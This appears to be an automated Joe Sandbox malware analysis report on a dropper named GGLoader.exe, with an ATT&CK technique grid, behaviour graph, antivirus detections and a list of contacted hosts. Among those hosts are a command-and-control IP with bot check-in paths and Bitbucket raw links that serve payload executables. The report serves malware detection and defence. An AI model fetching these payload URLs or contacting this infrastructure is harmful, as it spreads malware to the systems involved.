                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts22
                        Command and Scripting Interpreter                        		11
                        Scheduled Task/Job                        		1
                        Access Token Manipulation                        		21
                        Deobfuscate/Decode Files or Information                        		Security Account Manager2
                        File and Directory Discovery                        		SMB/Windows Admin Shares3
                        Clipboard Data                        		2
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts11
                        Scheduled Task/Job                        		Login Hook1
                        Windows Service                        		1
                        Abuse Elevation Control Mechanism                        		NTDS54
                        System Information Discovery                        		Distributed Component Object ModelInput Capture3
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts1
                        Service Execution                        		Network Logon Script713
                        Process Injection                        		31
                        Obfuscated Files or Information                        		LSA Secrets451
                        Security Software Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable Media3
                        PowerShell                        		RC Scripts11
                        Scheduled Task/Job                        		11
                        DLL Side-Loading                        		Cached Domain Credentials2
                        Process Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        File Deletion                        		DCSync61
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
                        Rootkit                        		Proc Filesystem1
                        Application Window Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                        Masquerading                        		/etc/passwd and /etc/shadow1
                        System Owner/User Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
                        Modify Registry                        		Network Sniffing1
                        Remote System Discovery                        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd61
                        Virtualization/Sandbox Evasion                        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                        Access Token Manipulation                        		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                        Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers713
                        Process Injection                        		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                        Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                        Hidden Files and Directories                        		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526110 Sample: GGLoader.exe Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 84 bitbucket.org 2->84 90 Suricata IDS alerts for network traffic 2->90 92 Found malware configuration 2->92 94 Antivirus detection for dropped file 2->94 96 25 other signatures 2->96 10 GGLoader.exe 2 2->10         started        14 powershell.exe 2->14         started        16 cmd.exe 2->16         started        18 5 other processes 2->18 signatures3 process4 dnsIp5 74 C:\Users\user\AppData\...behaviorgraphGLoader.exe.log, CSV 10->74 dropped 112 Encrypted powershell cmdline option found 10->112 114 Binary or sample is protected by dotNetProtector 10->114 116 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 10->116 21 powershell.exe 14 27 10->21         started        118 Writes to foreign memory regions 14->118 120 Modifies the context of a thread in another process (thread injection) 14->120 122 Injects a PE file into a foreign processes 14->122 26 dllhost.exe 14->26         started        28 conhost.exe 14->28         started        124 Uses cmd line tools excessively to alter registry or file data 16->124 126 Uses powercfg.exe to modify the power settings 16->126 128 Stops critical windows services 16->128 30 conhost.exe 16->30         started        38 10 other processes 16->38 86 45.159.189.105, 49739, 49740, 50007 HOSTING-SOLUTIONSUS Netherlands 18->86 130 Antivirus detection for dropped file 18->130 132 Loading BitLocker PowerShell Module 18->132 134 Modifies power options to not sleep / hibernate 18->134 32 conhost.exe 18->32         started        34 conhost.exe 18->34         started        36 conhost.exe 18->36         started        40 5 other processes 18->40 file6 signatures7 process8 dnsIp9 88 bitbucket.org 185.166.143.49, 443, 49730, 49731 AMAZON-02US Germany 21->88 68 C:\Users\user\AppData\...\LicenseGet.exe, PE32 21->68 dropped 70 C:\Users\user\AppData\Local\...\LicSend.exe, PE32+ 21->70 dropped 72 C:\Users\user\AppData\Local\...\LicCheck.exe, PE32 21->72 dropped 98 Potential dropper URLs found in powershell memory 21->98 100 Loading BitLocker PowerShell Module 21->100 102 Powershell drops PE file 21->102 42 LicSend.exe 2 21->42         started        46 LicCheck.exe 3 21->46         started        48 powershell.exe 15 21->48         started        50 conhost.exe 21->50         started        104 Found stalling execution ending in API Sleep call 26->104 106 Injects code into the Windows Explorer (explorer.exe) 26->106 108 Contains functionality to inject code into remote processes 26->108 110 4 other signatures 26->110 52 winlogon.exe 26->52 injected 54 lsass.exe 26->54 injected 56 svchost.exe 26->56 injected 58 12 other processes 26->58 file10 signatures11 process12 file13 76 C:\Users\user\AppData\Local\...\poduiwcd.tmp, PE32+ 42->76 dropped 78 C:\Program Filesbehaviorgraphoogle\Chrome\updater.exe, PE32+ 42->78 dropped 80 C:\Windows\System32\drivers\etc\hosts, ASCII 42->80 dropped 136 Antivirus detection for dropped file 42->136 138 Multi AV Scanner detection for dropped file 42->138 140 Suspicious powershell command line found 42->140 148 7 other signatures 42->148 60 dialer.exe 42->60         started        82 C:\Users\user\AppData\...\svcupdater.exe, PE32 46->82 dropped 142 Machine Learning detection for dropped file 46->142 144 Uses schtasks.exe or at.exe to add and modify task schedules 46->144 146 Drops large PE files 46->146 62 schtasks.exe 46->62         started        64 conhost.exe 48->64         started        signatures14 process15 process16 66 conhost.exe 62->66         started       

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        GGLoader.exe76%ReversingLabsWin32.Trojan.MarsStealer
                        GGLoader.exe100%AviraTR/Dropper.Gen
                        GGLoader.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Program Files\Google\Chrome\updater.exe100%AviraHEUR/AGEN.1325648
                        C:\Users\user\AppData\Local\Temp\LicCheck.exe100%AviraHEUR/AGEN.1317771
                        C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe100%AviraHEUR/AGEN.1319806
                        C:\Users\user\AppData\Local\Temp\LicSend.exe100%AviraHEUR/AGEN.1325648
                        C:\Program Files\Google\Chrome\updater.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\LicCheck.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\LicenseGet.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\poduiwcd.tmp100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\LicSend.exe100%Joe Sandbox ML
                        C:\Program Files\Google\Chrome\updater.exe79%ReversingLabsWin64.Trojan.Whisperer
                        C:\Users\user\AppData\Local\Temp\LicCheck.exe79%ReversingLabsWin32.Trojan.RealProtect
                        C:\Users\user\AppData\Local\Temp\LicSend.exe79%ReversingLabsWin64.Trojan.Whisperer
                        C:\Users\user\AppData\Local\Temp\poduiwcd.tmp75%ReversingLabsByteCode-MSIL.Trojan.Zilla

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://crl.microsoft0%URL Reputationsafe
                        https://contoso.com/License0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
                        http://schemas.micro0%URL Reputationsafe
                        https://aka.ms/pscore6lB0%URL Reputationsafe
                        https://contoso.com/0%URL Reputationsafe
                        https://nuget.org/nuget.exe0%URL Reputationsafe
                        https://oneget.orgX0%URL Reputationsafe
                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        http://nuget.org/NuGet.exe0%URL Reputationsafe
                        https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
                        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                        http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                        https://go.micro0%URL Reputationsafe
                        https://contoso.com/Icon0%URL Reputationsafe
                        http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                        https://aka.ms/pscore680%URL Reputationsafe
                        https://oneget.org0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        bitbucket.org
                        		185.166.143.49
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://45.159.189.105/bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31etrue
                            		unknown
                            https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exetrue
                              		unknown
                              http://45.159.189.105/bot/regextrue
                                		unknown
                                https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exetrue
                                  		unknown
                                  https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exetrue
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://crl.microsoftpowershell.exe, 00000028.00000002.2588137251.000001C536E3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devminpowershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://contoso.com/Licensepowershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://go.microsoft.co&powershell.exe, 00000028.00000002.2580308005.000001C536C2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmptrue
                                            		unknown
                                            https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfapowershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.microsvchost.exe, 00000036.00000000.2312885575.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223723010.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2962436516.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://45.159.189.105/bot/regexystem32svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.t.com/pkiops/cersoft%20Time-Stam202010(1).crt0powershell.exe, 00000001.00000002.1960407447.000001EC48E3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://aka.ms/pscore6lBpowershell.exe, 00000026.00000002.2228353344.0000000003141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://remote-app-switcher.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmptrue
                                                      		unknown
                                                      https://contoso.com/powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1925142827.000001EC40A84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512EA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512E8E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002512014C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2140674795.00000270C7706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2555004791.000001C52E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F6B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://oneget.orgXpowershell.exe, 00000003.00000002.1768225702.000002511FF03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://aui-cdn.atlassian.com/powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmptrue
                                                        		unknown
                                                        http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 0000002C.00000000.2223723010.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2962436516.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002511E871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B7691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2228353344.0000000003141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51E8A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://bitbucket.orgpowershell.exe, 00000001.00000002.1828229655.000001EC319F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://45.159.189.105/svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmptrue
                                                              		unknown
                                                              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1925142827.000001EC40A84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512EA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512E8E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002512014C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2140674795.00000270C7706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2555004791.000001C52E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000003.00000002.1768225702.000002511FF03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000028.00000002.2246120062.000001C51F62A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000028.00000002.2246120062.000001C51F62A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://go.micropowershell.exe, 00000003.00000002.1768225702.000002511F4A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C520930000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://bitbucket.orgpowershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://web-security-reports.services.atlassian.com/csp-report/bb-websitepowershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmptrue
                                                                          		unknown
                                                                          https://contoso.com/Iconpowershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000011.00000002.2039902997.00000270B9567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B9541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yqsvchost.exe, 00000035.00000003.2349769567.000001D5599A5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.expowershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://dz8aopenkvv6s.cloudfront.netpowershell.exe, 00000001.00000002.1828229655.000001EC31B7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31BC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000028.00000002.2246120062.000001C51F62A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://45.159.189.105/bot/online?guid=724471svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://cdn.cookielaw.org/powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                          		unknown
                                                                                          https://bitbucket.org/Bpowershell.exe, 00000001.00000002.1964124917.000001EC48EA7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                              		unknown
                                                                                              https://remote-app-switcher.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                		unknown
                                                                                                https://aka.ms/pscore68powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002511E871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B7691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51E8A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://bitbucket.org/5940jg9834/gf3443f3/raw/powershell.exe, 00000001.00000002.1828229655.000001EC31666000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://oneget.orgpowershell.exe, 00000003.00000002.1768225702.000002511FF03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown

                                                                                                  World Map of Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public IPs

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  45.159.189.105
                                                                                                  		unknownNetherlands
                                                                                                  		14576HOSTING-SOLUTIONSUStrue
                                                                                                  185.166.143.49
                                                                                                  		bitbucket.orgGermany
                                                                                                  		16509AMAZON-02UStrue

                                                                                                  General Information

                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                  Analysis ID:1526110
                                                                                                  Start date and time:2024-10-04 19:12:17 +02:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 12m 7s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:43
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:15
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:GGLoader.exe
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.adwa.spyw.evad.mine.winEXE@64/89@1/2
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 71.4%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 98%
                                                                                                  • Number of executed functions: 140
                                                                                                  • Number of non-executed functions: 214
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe

                                                                                                  Warnings

                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 20.190.159.64, 20.190.159.75, 40.126.31.73, 40.126.31.69, 20.190.159.0, 40.126.31.71, 20.190.159.73, 40.126.31.67
                                                                                                  • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, dns.msftncsi.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 3760 because it is empty
                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7520 because it is empty
                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7684 because it is empty
                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 8068 because it is empty
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  • VT rate limit hit for: GGLoader.exe

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
